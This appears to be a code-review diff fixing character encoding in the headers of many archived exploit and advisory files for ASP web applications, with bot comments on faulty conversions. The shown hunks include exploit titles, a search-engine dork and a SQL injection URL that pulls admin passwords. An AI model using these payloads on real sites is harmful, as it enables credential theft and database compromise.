|
|
|
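Review bot: Both ConfigAllowedExtensions.Add lines are now written with typographic quotes (“File”,”^(Extensions Here)$”), and VBScript only accepts the ASCII double quote as a string delimiter. An administrator who pastes this quick patch into config.asp gets a syntax error instead of the anchored allow-list the note is recommending. Because these lines are meant to be copied into a config file, normalise them to straight quotes: ConfigAllowedExtensions.Add "File","^(Extensions Here)$". The quotes around config.asp in the sentence above can stay typographic.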
@ -1,6 +1,6 @@
|
|||
################################################################################
|
||||
## ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
|
||||
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
|
||||
## Credit by | Chironex Fleckeri ##
|
||||
## Mail | ChironeX.FleckeriX@Gmail.Com ##
|
||||
|
|
|
@ -31,7 +31,7 @@ print "| |\n";
|
|||
print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
|
||||
print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
|
||||
print "| |\n";
|
||||
print "| By: Manuel L?pez #IST |\n";
|
||||
print "| By: Manuel L<EFBFBD>pez #IST |\n";
|
||||
print "|____________________________________________________________|\n";
|
||||
print "\n\n";
|
||||
exit(1);
|
||||
|
|
|
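Review bot: The author credit in the usage banner goes from "Manuel L?pez" to "Manuel L<EFBFBD>pez", so the accented letter is still lost and the print statement now contains the replacement character. Restore the name from the original advisory (presumably "López") or fall back to plain ASCII; as it stands the change only swaps one placeholder for another.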
@ -1,8 +1,8 @@
|
|||
<!--
|
||||
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
|
||||
# Author : ajann
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
|
||||
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
|
||||
|
||||
[Code]]]
|
||||
-->
|
||||
|
|
|
@ -10,7 +10,7 @@
|
|||
'[Author : ajann
|
||||
'[Contact : :(
|
||||
'[ExploitName: exploit1.asp
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur İnsallah ##
|
||||
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
|
||||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
|
|
|
@ -13,9 +13,9 @@
|
|||
|
||||
'[Note : exploit file name =>exploit1.asp
|
||||
'[Using : Write Target and ID after Submit Click
|
||||
'[Using : Tr:Alınan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
|
||||
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
|
||||
'===============================================================================================
|
||||
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
|
||||
|
||||
|
|
|
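Review bot: This hunk is inconsistent within itself. The last '[Using line is repaired ("düsünmüyorum" becomes "düsünmüyorum") while the first changed one is broken ("Tr:Alınan Sifreyi" becomes "Tr:Alýnan Sifreyi", with ý in place of ı). A single source-encoding assumption for the whole file does not fit both lines, so this file needs to be converted by hand or with Turkish bytes decoded as Windows-1254; the same regression shows up in the Greetz line of the previous hunk for this exploit ("İnsallah" becomes "Ýnsallah").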
@ -17,7 +17,7 @@ vulnerables fields:
|
|||
- Comments
|
||||
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@ variables:
|
|||
Hpecs_Find=maingroup&searchstring='[sql]
|
||||
( or just post your query in the search engine ... )
|
||||
|
||||
laurent gaffié & benjamin mossé
|
||||
laurent gaffié & benjamin mossé
|
||||
http://s-a-p.ca/
|
||||
contact: saps.audit@gmail.com
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/21398/info
|
||||
|
||||
Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/21511/info
|
||||
|
||||
Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
|
|
|
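Review bot: The product name at the start of the description is not actually fixed: after the change it still reads "Ã?ilem Haber Free Edition", and the "?" shows that a byte had already been lost, so no re-encoding can recover the first letter. Take the name from the advisory cited on the source line (securityfocus bid 21511) and write it in directly instead of converting the damaged text.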
@ -8,7 +8,7 @@
|
|||
|
||||
# Found By : ShaFuck31
|
||||
|
||||
# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
|
||||
# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
|
||||
|
||||
# Vulnerable file : down.asp
|
||||
|
||||
|
|
|
@ -24,12 +24,12 @@ PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upl
|
|||
+-----------+
|
||||
|
||||
Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code
|
||||
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges.
|
||||
execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges.
|
||||
The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using
|
||||
user input, without first checking if the user is authenticated or if input is valid. The application preserves the
|
||||
file name and extension of the upload, and allows an attacker to traverse from the default destination directory.
|
||||
Directory traversal is not necessary to gain code execution however, as the default path lies within the
|
||||
application’s web-root.
|
||||
application’s web-root.
|
||||
|
||||
|
||||
+------------+
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/24288/info
|
||||
|
||||
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
|
||||
|
||||
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
|
||||
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
|
||||
|
||||
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin
|
Some files were not shown because too many files have changed in this diff